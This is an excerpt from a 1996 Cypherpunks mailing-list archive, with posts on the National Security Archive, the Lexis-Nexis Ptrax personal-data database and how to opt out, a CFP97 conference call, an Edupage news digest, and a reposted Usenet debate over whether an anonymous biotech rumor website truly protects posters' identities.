May) Date: Tue, 10 Sep 1996 14:19:02 +0800 Subject: Yahoo!'s Picks of the Week (September 9, 1996) Message-ID: At 1:08 AM 9/10/96, William Knowles wrote: >Did anyone else catch this one? > >> Welcome to this week's selection of Picks, declassified and hot off >> the press thanks to the Freedom of Information Act. Well, okay, not >> really. But we like to pretend. On the other hand, if you would like >> to peruse what once was private but now is public (in a federal >> government sense of the word), head on over to The National Security >> Archive. An independent, non-governmental research institute and >> library, the NSArchive is where you'll find declassified >> U.S. documents that shed light on anything from the Nixon-Presley >> Meeting (Elvis wanted to be a Federal Agent at Large!) to the Cuban >> Missile Crisis and a handful of White House e-mail in-between. >> >> http://www.seas.gwu.edu/nsarchive/ The National Security Archive has been around for many years, and has no connection (insofar as I know or suspect) with the NSA. They have regularly supplied talking heads to various talk shows, especially six years ago during the Gulf War. (In fact, they have a leftist bias.) --Tim We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From dthorn at gte.net Mon Sep 9 23:20:10 1996 From: dthorn at gte.net (Dale Thorn) Date: Tue, 10 Sep 1996 14:20:10 +0800 Subject: TWA 800 - Serious thread. In-Reply-To: <56mZTD63w165w@bwalk.dm.com> Message-ID: <32349A90.51BD@gte.net> Dr.Dimitri Vulis KOTM wrote: > "Douglas B. 
Renner" writes: > with the investigation. Remember the World Trade Center investigation? > They knew immediately what type of vehicle the blast was in - but they > deliberately gave false information to the media. They said they were > looking into a blue stationwagon or some such BS, and the culprits > believed it! Federal agents staked out the rental agency where the > _van_ was rented from and caught one of the buggers, who thought the > investigation was way off track. Yes!!! > I recall that the perp rented the vehicle and gave a $400 cash > deposit. > He subsequently returned to the rental agency, stated that the vehicle > was stolen, and demanded his cash back. And the Oklahoma City perp was > caught speeding with no licence plates. > Shit. Whoever recruits those terrorists needs a better h.r. department > to screen for stupidity. :-) > thread is relevant. Fortunately this forum reaches some of the most > intelligent and well-informed minds on the net. > Why, thank you! > Dr.Dimitri Vulis KOTM > Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, > 14.4Kbps Per the tendency of federal agencies to let it be publicly known that they lie openly to trap suspects (and apparently this technique has been OK'd for local enforcement as well): This is going to backfire on them (and us), and probably has already. If govt. protects its "sources and methods", however nefarious, to the extent that the public is never asked to assent to these methods (even though a few of us know about them anyway), then the public doesn't have to become overtly cynical about what's going on. On the other hand, whether you think the people have this much right to know or not, when the public consciousness embraces the concept that the police openly and regularly lie (and that it's a "good thing" they do), the result will be greater public cynicism, distrust, paranoia, hatred, and anarchy (the bad kind). 
From dlv at bwalk.dm.com Mon Sep 9 23:23:54 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 10 Sep 1996 14:23:54 +0800 Subject: ... subversive leftists In-Reply-To: Message-ID: <73q1TD77w165w@bwalk.dm.com> tcmay at got.net (Timothy C. May) writes: > As to "tasteless and insulting," a matter of personal perspective. I find > it helpful to call a spade a spade, and others apparently do as well. > Of course, Tim gets very uncomfortable when others call a spade a spade. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 9 23:24:37 1996 From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith) Date: Tue, 10 Sep 1996 14:24:37 +0800 Subject: RRE: Lexis-Nexis personal information database Message-ID: <01I9AIVKYUFO9ULM12@mbcl.rutgers.edu> One wonders exactly how much of this information is compiled from government-generated sources? The SSN is automatically originally government-derived, of course... -Allen From: IN%"rre at weber.ucsd.edu" 7-SEP-1996 02:02:07.36 [Excerpt from Privacy Forum 5.17.] =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= This message was forwarded through the Red Rock Eater News Service (RRE). Send any replies to the original author, listed in the From: field below. You are welcome to send the message along to others but please do not use the "redirect" command. 
For information on RRE, including instructions for (un)subscribing, send an empty message to rre-help at weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Tue, 3 Sep 96 12:01 PDT
From: privacy at vortex.com (PRIVACY Forum)
Subject: PRIVACY Forum Digest V05 #17

PRIVACY Forum Digest Tuesday, 3 September 1996 Volume 05 : Issue 17

-----------------------------------------------------------------------------

Date: Tue, 3 Sep 1996 11:22:15 -0400 (EDT)
From: Larry Hunter
Subject: Lexis-Nexis personal information database

Lexis-Nexis sells a commercial database called "Ptrax" which holds detailed personal information on nearly all Americans (L-N claims it contains 300 million names). This database includes name, current address, up to two previous addresses, phone number, birth-date, social security number, mother's maiden name and possible other personal information. This database is kept quite current. Through the Nexis Express service, this information could be available to any individual with a credit card.

As most readers are aware, such information could easily be used for theft of identity and other frauds. It is possible to have one's name removed from this database by making a telephone request. Call (800)543-6862, select option 4 ("all other questions") and tell the representative answering that you wish to remove your name from the Ptrax database. You may also send a fax to (513)865-7360, or physical mail to LEXIS-NEXIS / P.O. Box 933 / Dayton, Ohio 45401-0933. Sending physical mail to confirm your name has been removed is always a good idea.

As word of the existence of this database has spread on the net, Lexis-Nexis has been inundated with calls, and has set up a special set of operators to handle the volume. In addition, Andrew Bleh (rhymes with "Play") is a manager responsible for this product, and is the person to whom complaints about the service could be directed.
He can be reached at the above 800 number, select option 4 and then ask for extension 3385.

The information in this note has been confirmed by me, and was originally provided in forwarded messages from Russell Whitaker, Jason Werner, Vern Winters, Katherine Florman and Reuben Snipper.

Larry Hunter
hunter at intr.net

------------------------------

End of PRIVACY Forum Digest 05.17
************************

From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 9 23:25:21 1996
From: EALLENSMITH at ocelot.Rutgers.EDU (E. Allen Smith)
Date: Tue, 10 Sep 1996 14:25:21 +0800
Subject: RRE: Computers, Freedom, and Privacy
Message-ID: <01I9AIWML6889ULM12@mbcl.rutgers.edu>

From: IN%"rre at weber.ucsd.edu" 7-SEP-1996 07:46:46.51

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE). Send any replies to the original author, listed in the From: field below. You are welcome to send the message along to others but please do not use the "redirect" command. For information on RRE, including instructions for (un)subscribing, send an empty message to rre-help at weber.ucsd.edu
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Tue, 3 Sep 1996 12:37:14 -0700 (PDT)
From: Bruce R Koball

THE SEVENTH CONFERENCE ON COMPUTERS, FREEDOM, AND PRIVACY
Call for Participation
San Francisco Airport Hyatt Regency Hotel
Burlingame, California
March 11-14, 1997

CFP97: Commerce & Community will be sponsored by the Association for Computing Machinery SIGCOM and SIGSAC. The host institutions will be Stanford University and the University of California at Berkeley. Co-sponsors and cooperating organizations include the ACM SIGCAS, the Electronic Frontier Foundation, the Center for Democracy and Technology, the Electronic Privacy Information Center, and the WELL.
CFP97: Commerce & Community is the latest in a series of annual conferences assembling a diverse group of experts and advocates from the domains of technology, business, government, and academia to explore the evolution of information and communication technologies and public policy, and its effects on freedom and privacy in the United States and throughout the world. Past CFP sessions have discussed, debated -- and often anticipated -- issues of great social import. In this tradition, CFP97: Commerce & Community will examine the social and policy questions posed by: * the growth of electronic communities; * electronic commerce and the commercialization of cyberspace; * the problems of legal and regulatory control of the Net; * the interests of privacy and property in the electronic domain; * high-tech law enforcement and security concerns. The CFP97 Program Committee invites your suggestions for presentations on these or other important issues at the nexus of technology, business, public policy, freedom, and privacy. Proposals may be for individual talks, panel discussions, debates, moot courts, moderated, interactive sessions or other formats. Each proposal should be accompanied by a one-page statement describing the topic and format. Descriptions of multi-person presentations should include a list of proposed participants and session chair. Proposals should be sent by email to cfp97 at cfp.org. If necessary, typewritten proposals may be sent to: CFP'97, 2210 Sixth Street, Berkeley, CA 94710. Please submit your proposal as soon as possible. The deadline for submissions is October 1, 1996. (Please note that we have extended our deadline for submissions) For more information on the Computers, Freedom and Privacy Conferences, as well as up-to-date announcements on CFP'97, please visit our Web page at: http://www.cfp.org cfp97_call v1.2 From perry at piermont.com Mon Sep 9 23:35:21 1996 From: perry at piermont.com (Perry E. 
Metzger)
Date: Tue, 10 Sep 1996 14:35:21 +0800
Subject: Satellite Movement?
In-Reply-To: <960909031224_102540.2453_HHV82-1@CompuServe.COM>
Message-ID: <199609100335.XAA26422@jekyll.piermont.com>

It's messages like this that make me feel happy that I no longer make reading cypherpunks an important priority in my day.

Blak Dayz writes:
> I was out buying groceries and after they scanned the shit through they
> told me that all the ATMs in the City were out due to connection problems. So i
> go home and start trying to scan for the shits and i can't find them. If anyone
> knows what the hell happened i would appreciate the details. I believe it may
> have been a solar flare that caused the companies to redirect their satellites.
> It would do me a lot of help considering i had to pay CASH (i hate paper) for the
> stuff and i would like to complain to the fucking JPL and satt. operators about
> them warning the public.
>
>

From dlv at bwalk.dm.com Mon Sep 9 23:40:04 1996
From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Tue, 10 Sep 1996 14:40:04 +0800
Subject: Conjuring up the latest utopia for a minoritarian sect of illumin
In-Reply-To:
Message-ID:

tcmay at got.net (Timothy C. May) writes:
> Yes, Bosnians and Serbs would not be killing each other if only they could
> receive government-approved information!

Why yes - they wouldn't have re-started killing each other (after a brief hiatus of about 50 years) if they had access to mass media other than the gov't controlled TV, compared to which even CNN is almost impartial.

---
Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps

From EALLENSMITH at ocelot.Rutgers.EDU Mon Sep 9 23:50:50 1996
From: EALLENSMITH at ocelot.Rutgers.EDU (E.
Allen Smith) Date: Tue, 10 Sep 1996 14:50:50 +0800 Subject: Edited Edupage, 8 Sept 1996 Message-ID: <01I9AJIWWX1O9ULM12@mbcl.rutgers.edu> From: IN%"educom at educom.unc.edu" 9-SEP-1996 11:29:04.71 >************************************************************ >Edupage, 8 September 1996. Edupage, a summary of news about information >technology, is provided three times a week as a service by Educom, >a Washington, D.C.-based consortium of leading colleges and universities >seeking to transform education through the use of information technology. >************************************************************ [...] >SCIENTOLOGISTS FIGHT FOR COPYRIGHT PROTECTION ON NET >Police investigators in Helsinki say the Internet "anonymous remailer" site >anon.penet.fi was shut down partially because of a copyright dispute with >the Church of Scientology (and not because the site was a primary conduit >for child pornography, as was previously reported). The Church of >Scientology, which has been successful in convincing the courts that its >teachings are validly copyrighted material, was pursuing an individual who >used the anonymous remailer site to post Scientology texts without the >Church's permission. The operator of the site decided to close it down >rather than reveal the individual's name to Helsinki police. The Church >says it was not opposing the existence of the server: "We have no >opposition to there being anonymity for private, consensual communications. >What we oppose is using anonymous servers for the purpose of permitting >criminal or other unlawful acts." (New York Times 6 Sep 96 C2) Why don't I believe the first portion of that statement? [...] >COPYRIGHT LAW ARCHIVED ON THE NET >The Stanford University library is working with the Council on Library >Resources to compile an electronic archive of information on copyright law >in an effort to keep educators and others aware of the ongoing debate over >the "fair use" doctrine. 
The Stanford site < http://fairuse.stanford.edu > >contains the full text of court decisions, legislation and international >copyright agreements, as well as related articles on the topic. (Chronicle >of Higher Education 6 Sep 96 A42) >NEW ANGLE ON WEB SURFING >BroadVision's new Web site, called The Angle, features the company's >One-To-One intelligent agent and WebPoint content management technologies. >"What intranets are looking for are ways to help users of their site get >information they need, and are entitled to, quickly and efficiently without >too much surfing," says the company's CEO, who touts his service as an >efficiency-booster for corporate technology managers. Unlike its rival, >Firefly, which is used to direct music seekers to selections they might like >based on similar buyers' tastes, the One-To-One agent software is built on >rule-based reasoning. BroadVision is considering licensing Firefly's >technology, which uses a personalization algorithm to identify trends among >users and personal tastes, to expand its offerings. (Interactive Age >Digital 4 Sep 96) [...] >CONGRESS, NOT THE COURTS, TO RESOLVE COPYRIGHT ISSUES >The U.S. Patent and Trademark Office is shifting gears in its drive to >resolve electronic copyright issues, and is now working with members of >Congress to develop a legislative solution to the issue of online service >provider liability, which has been a sticking point in efforts to pass new >copyright legislation. "We are looking for a way to define the nature of >the provision of mere telecommunications services, for which >telecommunications providers should bear no liability for copyright >infringement. We are trying to define where the dividing line is between >someone who actively engages in the provision of information versus someone >who is a mere conduit," says a senior legal counselor for the PTO. 
The PTO >originally believed these issues could be resolved through the court system, >but now says it will work with Congress and industry to develop legislative >solutions. (BNA Daily Report for Executives 4 Sep 96 A4) Eeep... I trust the courts more than people selected by a popularity contest. Remember that various of the worse CDA-replacement bills had in them provisions for CDA-like filtering being protected from liability? To me, that's a pretty clear government sponsorship of such filtering, which makes it censorship. [...] >WHERE WIZARDS STAY UP LATE >The NY Times Sunday Book Review says the Hafner/Lyon book on the origins of >the Internet ("Where Wizards Stay Up Late") compiles a great deal of >much-needed information and "shows just how striking an innovation and >collaboration the Arpanet really was. One central focus of the book >(excerpted in the Sep/Oct Educom Review) is the contribution of the >brilliant psychologist and computer scientist J.C.R. Licklider, who >predicted an era when "human brains and computing machines will be coupled >.... tightly, and ... the resulting partnership will think as no human brain >has ever thought and process data in a way not approached by the >information-handling machines we know today." (New York Times Book Review 8 >Sep 96 p19) >Edupage is written by John Gehl & Suzanne Douglas >. Voice: 404-371-1853, Fax: 404-371-8057. >Technical support is provided by Information Technology Services at the >University of North Carolina at Chapel Hill. >************************************************************ >Edupage ... is what you've just finished reading. To subscribe to Edupage: >send mail to: listproc at educom.unc.edu with the message: subscribe edupage >Niccolo Machiavelli (if your name is Niccolo Machiavelli ; otherwise, >substitute your own name). ... To cancel, send a message to: >listproc at educom.unc.edu with the message: unsubscribe edupage. 
(If you >have subscription problems, send mail to manager at educom.unc.edu.) From snow at smoke.suba.com Tue Sep 10 00:03:29 1996 From: snow at smoke.suba.com (snow) Date: Tue, 10 Sep 1996 15:03:29 +0800 Subject: SPL -- Suspicious Persons List In-Reply-To: Message-ID: On Mon, 9 Sep 1996, Timothy C. May wrote: > Digitaltronics Corporation V.P of Human Relations: "Joe, thanks for coming > in this morning. I'm sure you're busy, so I'll make this as short as > possible. OK with you?" > Suspicious Persons List, and there's just nothing we can do about it. We > just can't have our corporate image linked to persons on the SPL. Now, Joe, > you'll get a generous 6 weeks of severance pay, and Daphne will assist you > with your outplacement processing. Of course, Joe, you will have to go > through an inspection every morning until you're fully processed...there's > that SPL matter, you know." > JS: "Uh..." In this case I wouldn't bother with Mr. Bell's solution. Petro, Christopher C. petro at suba.com snow at smoke.suba.com From dlv at bwalk.dm.com Tue Sep 10 00:05:37 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 10 Sep 1996 15:05:37 +0800 Subject: [WAS xs4all.nl] Terrorists In-Reply-To: <2.2.32.19960909182912.008bf55c@panix.com> Message-ID: Duncan Frissell writes: > And I support a terrorist organization (the US Government) every year > whether I want to or not. The US was convicted of a major violation of > international law (akin to terrorism) in the International Court of Justice > back in the '80s for air sowing mines in Nicaragua's main harbor. The U.S. committed heinous war crimes (on par with Nazi Germany) in Korea, Viet Nam, Nicaragua, Panama, Grenada, Iraq, and many other countries. President Clinton is a bloodthirsty terrorist, guilty of murder, high treason, and other capital crimes. 
--- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From tcmay at got.net Tue Sep 10 00:07:02 1996 From: tcmay at got.net (Timothy C. May) Date: Tue, 10 Sep 1996 15:07:02 +0800 Subject: Satellite Bowel Movement? Message-ID: At 3:12 AM 9/9/96, Blak Dayz wrote: > I was out buying groceries and after they scanned the shit through they >told me that all the ATMs in the City were out due to connection problems. So i >go home and start trying to scan for the shits and i cant find them. If anyone >knows what the hell happened i would appreciate the details. I believe it may >have been a solar flare that caused the companies to redirect their satellites. >It would do me alot of help considering i had to pay CASH (i hate paper) >for the >stuff and i would like to complain to the fucking JPL and satt. operators about >them warning the public. I agree. In times like this, they should be warning the public! The overload was caused by Zeta Reticulans draining more power from the grid than had been planned by the Ruling Council. Clinton dispatched _three_ of his Black Helicopters to Area 51, and they kicked some alien butt. I think the Morks will be more malleable. We on the Doom13/D&D/Cypherpunks list are wise to their wayz, and their warez, and will issue aluminum foil helmets to all those in danger. Latr, d00d! --Zarkon From 102540.2453 at CompuServe.COM Tue Sep 10 00:34:46 1996 From: 102540.2453 at CompuServe.COM (Blak Dayz) Date: Tue, 10 Sep 1996 15:34:46 +0800 Subject: Satellite Movement? Message-ID: <960909031224_102540.2453_HHV82-1@CompuServe.COM> I was out buying groceries and after they scanned the shit through they told me that all the ATMs in the City were out due to connection problems. So i go home and start trying to scan for the shits and i cant find them. If anyone knows what the hell happened i would appreciate the details. 
I believe it may have been a solar flare that caused the companies to redirect their satellites. It would do me alot of help considering i had to pay CASH (i hate paper) for the stuff and i would like to complain to the fucking JPL and satt. operators about them warning the public. From dlv at bwalk.dm.com Tue Sep 10 00:38:25 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Tue, 10 Sep 1996 15:38:25 +0800 Subject: Anonymity thread from sci.research.careers Message-ID: Recently I noticed an interesting thread on the Usenet newsgroup s.c.r regarding a Web site with a conferencing system, supposedly anonymous. I repost several articles which some folks on cp might find interesting. Path: !howland.erols.net!news2.digex.net!access1.digex.net!arthures From: "Arthur E. Sowers" Newsgroups: sci.research.careers Subject: Review and Warning about the "Biotech Rumor Mill" Date: Mon, 2 Sep 1996 22:16:39 -0400 Organization: Express Access Online Communications, USA Lines: 114 Message-ID: References: NNTP-Posting-Host: access1.digex.net Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Sender: arthures at access1.digex.net In-Reply-To: Folks, I decided to visit this web site and tell all of you a few things you ought to keep in mind. First, the review: Yes, the "Rumor Mill" is a sort-of web-site "newsgroup". The majority of posts and responses that I saw (not counting the archives) were by "anonymous" posters. A good many were not particularly "hot" (such as "why is company 'X' stock dropping?" and some inane comments). Some were cryptic (meaning to the average person, they might be essentially meaningless). Most were very short (1-2 sentences). A few posts did have some information that I downloaded for use later. One or two mentioned lawsuits (patent infringement). Second, the warning: The Rumor Mill lets you post anonymously (as far as I could see, but I did not try it) but THAT DOES NOT MEAN THAT SOMEONE WILL NOT KNOW WHO YOU ARE. 
I don't know how the Rumor Mill is operated, but I do know that websites CAN be configured to capture information about browser users who access that site! They can get a large amount of information about you including your name, email address, all sorts of information about your domain & ISP, etc. Your anonymous post may appear to everyone else as anonymous, but the sysop (webmaster) at that site should be presumed to be capable of determining who you are. I myself have seen website "hit statistics" and believe me, it all shows up. You should look in your Web Browser directory for the file and note that some web sites that you visit will put short lines of data into your file. You might try to change the attributes on that file to "read only" and see what happens. Sometimes it will thwart the web site, sometimes it will give you an error message. As a matter of fact, I did click on one button and my netscape security window opened up to warn me that the channel to that site was not secure. What else is related to this? There are a number of anonymous remailers out in cyberspace, but it has been stated by a knowledgeable source that a number of them are being operated by law enforcement agencies (presumably to troll for criminal activity). A website which allows rumors to be posted anonymously, especially involving commercial business details (i.e. proprietary) but carries at least no disclaimer that the sysop or sponsors do not use hit statistics data to correlate it with anonymous posters and thereby determine or attempt to determine thier identity is a website that I would avoid using. In the worlds of politics, leaks, trial-baloons, rumor, inuendo, insinuations, etc. are common and make for entertaining reading for those who enjoy it. 
But in the world of commerce, the wrong blip in the wrong place can lead to lawsuits, prosecution (by, for example, the Securities and Exhange Commission), and other personal information, identity, etc., to fall into hands that I would hope smart people might think about before they make posts. I have the feeling that a simple post to a newsgroup through a remailer would be safer that an anonymous post to the Rumor Mill. At least, I would get into the configuration dialog boxes on your web browser and leave "your name" and "your email address" blank, or put in a dummy name. But then, you can figure out that this is a way to also send forged mail (there was a "fake mail" website about a year or two ago, but the sysops eventually shut it down). There is in fact a website out there that says it can be used for anonymous web browsing (and I expect at some time in the future that they will start charging for its use [think for a minute why these would exist and it will be obvious]), but where I have that little snit of paper is burried on my desk with mountains of uncolated paperwork (sorry). What dothey say about "buyer beware?" Caveat emptor? Eh? Art Sowers ======= On 29 Aug 1996, Linda St. James wrote: > Do you want to have a little fun and perhaps learn something about the > current state of the biotechnology industry? > > Have you a particular company you've been interested in that you'd like > more information on -- but the "inside scoop" seems better than an > official company profile? > > IF SO --- > > > Please take a look at Dr. Martin Leach's BIOTECH RUMOR MILL, one of the > most fascinating sites on the WWW for the biotechnologist. > > In this site, Martin goes to great lengths to have an "all in one > location" center for biotechnology news. Whether it is the daily reports > from PR Newswire, or his reader surveys, you are bound to find something > of interest. 
But, to prove that the internet imitates real life, some of > the most interesting tidbits are pure rumor. > > In this site, you and your colleagues have an opportunity to post > information in a completely anonymous fashion. Some of the biggest news in > the biotechnology business comes out of the "Rumor Mill" before it hits > the trade journals, or even the Wall Street Journal! Of course, you have > to remember that in any forum where anyone can post anonymously, there is > a certain amount of frivolity as well. But what fun! > > Search Masters International, an industry-leading search firm specializing > in Biotechnology, Pharmaceuticals, and Medical Device industries, is now a > sponsor of this site along with Research Diagnostics. > > Take a look at your earliest convenience: > > The Biotech Rumor Mill is at: http://www.tradesmart.com/rumor > > The Search Masters International home page is at: http://smi.bio.com/ > > Best regards, > > Linda St. James, Office Manager > Search Masters International > Five Hundred Foothills South, Suite #2 > Sedona, AZ 86336 > (520) 282-3553 Phone or (520) 282-5881 Fax > email to lindasj at sedona.net > > Path: !howland.erols.net!news2.digex.net!access5.digex.net!arthures From: "Arthur E. Sowers" Newsgroups: sci.research.careers Subject: Re: Review and Warning about the "Biotech Rumor Mill" Date: Tue, 3 Sep 1996 13:59:21 -0400 Organization: Express Access Online Communications, USA Lines: 89 Message-ID: References: NNTP-Posting-Host: access5.digex.net Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Sender: arthures at access5.digex.net In-Reply-To: On 3 Sep 1996, Dave Jensen wrote: > In article , > "Arthur E. Sowers" wrote: "Nice" of you to delete ALL of my post instead of dealing with the specific issues, or CONSIDERING that I might have some valid points. > > Art you have gone off the deep end. > > Yes, let's now add web site reviews and critiques to your mix of strange > posts. 
Personally, I think you miss the whole point of Martin's rumor mill > site, and it is obvious that you didn't read the webmaster's introduction > of how he handles anonymity. I returned to that website a few minutes ago to look over "how he handles anonymity" and nothing in what he said negates the possibility that he (and, by extension, can share "intelligence" information about the source of the rumor and maybe even the identity of the poster). You can have him look at his web hit statistics and he will find my "visit" listed (or at least he should be able to find it, as I did not go to the site "cloaked"). As a matter of fact, the wording of the disclaimers (at .../rumor/post.html) is that "All correspondees identities will be kept confidential." which says to me that he (and you?) may "keep" them confidential (i.e. you may know them, even though you may not broadcast them all over the net, and that may give you some valuable insight into who says what and when). He says at another point "..., an email is sent directly to me and a message is appended to the Rumor Mill." As far as I am concerned, if you go over to the anonymous newsgroups and read about privacy (and get the help file from Julf Helsingius' anon remailer) ANY sysop can read any mail that comes through a sysop's site. And, if I were in a private business, I would see the temptation to "use" that information being just as strong as governments all over the world justify having their own CIAs, NSAs, KGBs, etc., and just as strong as many corporations have their own "intelligence" activities, reverse engineering departments, and private security and investigation units. If you go to any good sized public library and look up under industrial espionage and spying, you will get many books on this. You can try to pull the wool over most of the eyes around here, but it ain't gonna work with me. You would also be advised to work with Martin to rephrase some of his language.
He says at another point in a page that "This site is for entertainment purposes only." Hell, that's crap. If I go looking for such gossip and rumors, it's because it deals with something that impacts on my life, my job, my career and it better be good poop! Besides, on the esthetics, virtually every (EVERY) post that I clicked on had this overly obvious "Proudly Sponsored by -- SMI" box plastered right on the top. Then right under it is the RDI box. Man, can't you guys show a little "class" and just have this showing just once on the home page and cut out all the repetition? It turns me off. And, you should have thanked me for NOT mentioning all the posts that are now archived that reported problems hitting your SMI site (I didn't read more than one or two of them). > Stick to what you know, Art, which appears to me to be academic career > tracks. No one has ever disputed your commentary in that area. But, like > the restaurant reviewer who thinks he now knows enough about entertainment > to review opera, you have gone over the edge and into territory better > left for those who, like Dr. Martin Leach, really know how to provide > value on the WWW. Your opinion, as usual. But for the rest of you out there, think twice about posting an "anonymous" message to a web site. I've been on the other end of them, and I know that people sit around trying to figure out as much as possible about who it's from if they don't get an email identity. Or... how, Dave, would you like it if I tried to go in and put a warning to visitors to that site? Would you and or Martin "censor" my post? After all, at another place on the website is the statement that "I am not responsible for the accuracy of this information although I try to confirm where possible." I know that many "service providers" openly state that they reserve the right to decline or terminate service to any subscriber for any reason at any time.
Martin could be in a little "free speech" trouble and you and he might get together (since you are sponsoring, too, and therefore "calling the tune") and talk about this. I should send you a bill for consulting time on this, actually. > > Dave > > Art Sowers Path: !howland.erols.net!news2.digex.net!access2.digex.net!arthures From: "Arthur E. Sowers" Newsgroups: sci.research.careers Subject: Re: Review and Warning about the "Biotech Rumor Mill" Date: Wed, 4 Sep 1996 22:03:34 -0400 Organization: Express Access Online Communications, USA Lines: 118 Message-ID: References: <50i2rr$t6i at news.bu.edu> NNTP-Posting-Host: access2.digex.net Mime-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII X-Sender: arthures at access2.digex.net In-Reply-To: On Wed, 4 Sep 1996 mmartin at BIOMED.MED.YALE.EDU wrote: > About the Biotech Rumor Mill - I think it is a very cool idea. Really, I > do. I have some doubts about the duplicity of the statement *for > entertainment purposes only* but I can live with it. (It just sounds a bit > too much like those ads on late-night TV for psychics; most of the ad is > full of testimonials about how the service accurately predicted things and > how it helps people by predicting events but if you look closely there is > a small disclaimer that says *for entertainment purposes only*. Yeah, > right. But Martin Leach isn't charging for access, so I can live with it.) > > On 3 Sep 1996, Martin Leach wrote: > > > Hi Arthur, > > > > I read your initial comments to Dr. Jensen and feel that are being a little > > paranoid. > > To each his own. Just because you are paranoid > doesn't mean they aren't out to get you (or so the saying goes). ha, ha. > > > Information can be readily collected by any adept webmaster that wishes > > to.....so your comments are applicable to EVERY web site. > > Can't argue with that. But, of course, that isn't the point. The point is > that your site (unlike the vast majority of sites) claims to protect > anonymity.
If you claim to protect anonymity, then your site should be > held to different standards. > > > Just because > > somebody clicks 'submit' on a form e.g. posting form on my site it does not > > send any extra information that cannot be gathered any other nefarious way. > > I don't think Art was suggesting anything of the sort (Art, feel free to > correct me if I'm wrong). I think he was just pointing out that it is > possible to gather a lot of information about a poster - information that > the poster may not be aware that he/she is giving. People (even > scientists!) are generally unaware about how insecure electronic > transmissions are and I think Art was just trying to raise the level of > awareness. Yep, that is what I had in mind. The anonymous posts may be anonymous to everyone else, but the "masters" at that site have it in their power to know where the post came from and who authored it and that could give them some interesting information to be privy to. Julf Helsingius who used to run the anon.penet remailer was a lot more honest about security and was very upfront about this in his "help" responder. But his site is off the air now. I could make lots of speculations but I won't. But everyone should beware of anything which is offered for "free" by business entities. Sometimes it's a PR thing. Sometimes it's genuine altruism. And sometimes it's a pure scam. I won't openly estimate here how I would partition the fractions between those three possibilities. However, if I were running the "Rumor Mill" I would have a lot more extensive of a disclaimer and explanation (not only for PR but for legal purposes...I would not want to be a party in a lawsuit to "leaked" proprietary information... there is a fair bit of case law on this now). > The reason your site has become a lightning rod for security/privacy > issues is that you claim to protect anonymity.
This discussion could be > about any website, but it only seems relevant when a website claims to > protect anonymity. I don't think it was meant to suggest that you (or > anyone who has privileged access to the site) would actually abuse the > contract of anonymity, but of course you can't warn people about > potential abuse without it looking like you think it is likely that > people will abuse privileges. (hope that convoluted sentence makes sense) I know what you mean, and if those guys are smart, they will think about this a little. > Anyway, if I had something that could get me fired, sued, or blackballed, > I sure wouldn't want to trust someone's claim of anonymity - especially > since that claim is probably not legally enforceable (i.e., I couldn't sue > the webmaster for damages if s/he made my identity known). Well, the anon.penet service got the local Finnish authorities (i.e. the heat) on their rear ends and that caused the whole service to terminate. The FBI, here, has been known to just go in and confiscate the hardware and software if they want to shut someone down for good cause. Suppose you were a company that didn't like something. Money and lawyers can lead to actions to stop something. I recall a year or two ago that one of the tobacco companies didn't like the results of a researcher which got published and came out as anti-tobacco. What did the company do? They used legal maneuvering to force the researcher to turn over all of his notes, data, notebooks, manuscript drafts to the tobacco company. How do you like them apples? By the way, this was reported in an issue of _Science_ back maybe 2 (?) years ago. > This is even > more important if that someone is intimately tied to the industry about > which I have information! I'd be much more likely to send it through an > anonymous remailer (even though those are no longer secure).
I'd go for plain paper, handled with gloves that had not been touched on the outside by any of my pinkies, in an envelope, addressed and stamped (without licking), to the Wash Post, NY Times, and FBI, if I had something to blow the whistle about. You know, like in the spy novels written by ex-spooks. > Call me paranoid, if you will. But I sure as heck won't go walking in > downtown at night with $20 bills taped all over me - I'd just be asking > to get robbed, wouldn't I? I don't see that this is any different (except > in degree, perhaps). Right-on! > > Margaret A. Martin > > Yale University > mmartin at biomed.med.yale.edu > > > Art Sowers Path: !magnus.acs.ohio-state.edu!lerc.nasa.gov!purdue!news.bu.edu!darwin!leach From: leach at darwin (Martin Leach) Newsgroups: sci.research.careers Subject: Re: Review and Warning about the "Biotech Rumor Mill" Date: 3 Sep 1996 20:02:03 GMT Organization: Boston University Lines: 163 Message-ID: <50i2rr$t6i at news.bu.edu> References: NNTP-Posting-Host: darwin.bu.edu X-Newsreader: TIN [version 1.2 PL2] Hi Arthur, I read your initial comments to Dr. Jensen and feel that are being a little paranoid. Information can be readily collected by any adept webmaster that wishes to.....so your comments are applicable to EVERY web site. Just because somebody clicks 'submit' on a form 